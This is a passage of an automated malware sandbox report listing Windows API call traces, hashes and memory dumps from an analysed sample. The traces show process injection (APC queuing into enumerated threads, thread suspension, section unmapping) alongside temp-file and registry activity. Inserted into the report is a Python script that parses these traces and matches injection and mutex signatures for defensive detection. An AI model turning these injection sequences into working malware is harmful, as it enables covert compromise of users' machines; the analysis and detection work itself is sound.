  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
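The subcall chain under function 001CB35F above (CreateToolhelp32Snapshot, Thread32First, OpenThread with desired access 001F03FF, QueueUserAPC, Thread32Next) is the classic loop that opens every thread of a target process and queues an APC into it, and the OpenMutexA, SetLastError(000000B7), CreateMutexA triple under 001C44A4 earlier on this page is a named-mutex single-instance check. The Python below is an added example, not part of this report and not Joe Sandbox code: it parses such "APIs" lines back into per-function call sequences, matches them against ordered API chains, and names the static first arguments where they are well-known Win32 constants. The signature labels, the `<caller>` placeholder and the `SAMPLE` text (lines copied from the entries above) are ours; the constant values are the Windows 7 ones.

```python
"""Parse the per-function "APIs" entries of a Joe Sandbox report and flag known
API chains.  Added example, not part of the report or of Joe Sandbox itself."""
import re

# Constructed input: lines copied from the "APIs" entries above (functions
# 001CB35F and 001C44A4).  In a real run you would feed the whole report text.
SAMPLE = """\
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
"""

# One report line: optional "Part of subcall function <addr>: ", then
# Api.MODULE, optional (args), then "ref: <addr>".
LINE_RE = re.compile(
    r"(?:Part of subcall function (?P<func>[0-9A-F]+): )?"
    r"(?P<api>\w+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)

# Ordered chains (the labels are ours).  Matching is by subsequence, so
# unrelated calls between the listed ones (e.g. GetProcAddress) do not matter.
SIGNATURES = {
    # enumerate every thread, open it, queue an APC: APC-based injection loop
    "apc_injection_loop": ["CreateToolhelp32Snapshot", "Thread32First",
                           "OpenThread", "QueueUserAPC", "Thread32Next"],
    # open-or-create a named mutex and report ERROR_ALREADY_EXISTS: single-instance check
    "single_instance_mutex": ["OpenMutexA", "SetLastError", "CreateMutexA"],
}

# Win32 constants (Windows 7 values) keyed by the call that takes them first.
KNOWN_CONSTANTS = {
    ("OpenThread", 0x001F03FF): "THREAD_ALL_ACCESS",
    ("OpenProcess", 0x001F0FFF): "PROCESS_ALL_ACCESS",
    ("SetLastError", 0x000000B7): "ERROR_ALREADY_EXISTS",
}


def parse_api_lines(text, caller="<caller>"):
    """Group the report's API lines by the function they belong to.

    Calls made directly by the function being described carry no
    "Part of subcall function" prefix; they are filed under `caller`.
    """
    funcs = {}
    for raw in text.splitlines():
        m = LINE_RE.search(raw)
        if not m:
            continue
        args = [a for a in (m.group("args") or "").split(",") if a]
        funcs.setdefault(m.group("func") or caller, []).append(
            {"api": m.group("api"), "module": m.group("module"),
             "args": args, "ref": m.group("ref")})
    return funcs


def is_subsequence(needle, hay):
    """True if every name in `needle` occurs in `hay` in that order."""
    it = iter(hay)
    return all(name in it for name in needle)


def find_chains(funcs, signatures=SIGNATURES):
    """Return (function_address, signature_label) for every matching chain."""
    hits = []
    for func, calls in funcs.items():
        names = [c["api"] for c in calls]
        hits.extend((func, label) for label, chain in signatures.items()
                    if is_subsequence(chain, names))
    return hits


def name_first_arg(call):
    """Resolve a call's first static argument to a named constant, else None."""
    if not call["args"]:
        return None
    try:
        value = int(call["args"][0], 16)
    except ValueError:       # '?' or another non-numeric placeholder
        return None
    return KNOWN_CONSTANTS.get((call["api"], value))


def analyse(text):
    funcs = parse_api_lines(text)
    constants = [(c["api"], c["ref"], name_first_arg(c))
                 for calls in funcs.values() for c in calls if name_first_arg(c)]
    return {"chains": find_chains(funcs), "constants": constants}


if __name__ == "__main__":
    result = analyse(SAMPLE)
    for item in result["chains"] + result["constants"]:
        print(item)
```

Run against the sample it reports `('001CB35F', 'apc_injection_loop')`, `('001C44A4', 'single_instance_mutex')`, and names the 001F03FF passed to OpenThread as THREAD_ALL_ACCESS and the 000000B7 passed to SetLastError as ERROR_ALREADY_EXISTS. Argument values in these entries are static guesses by the disassembler, so treat a `?` as unknown rather than zero, which is why `name_first_arg` refuses non-hex placeholders.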
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
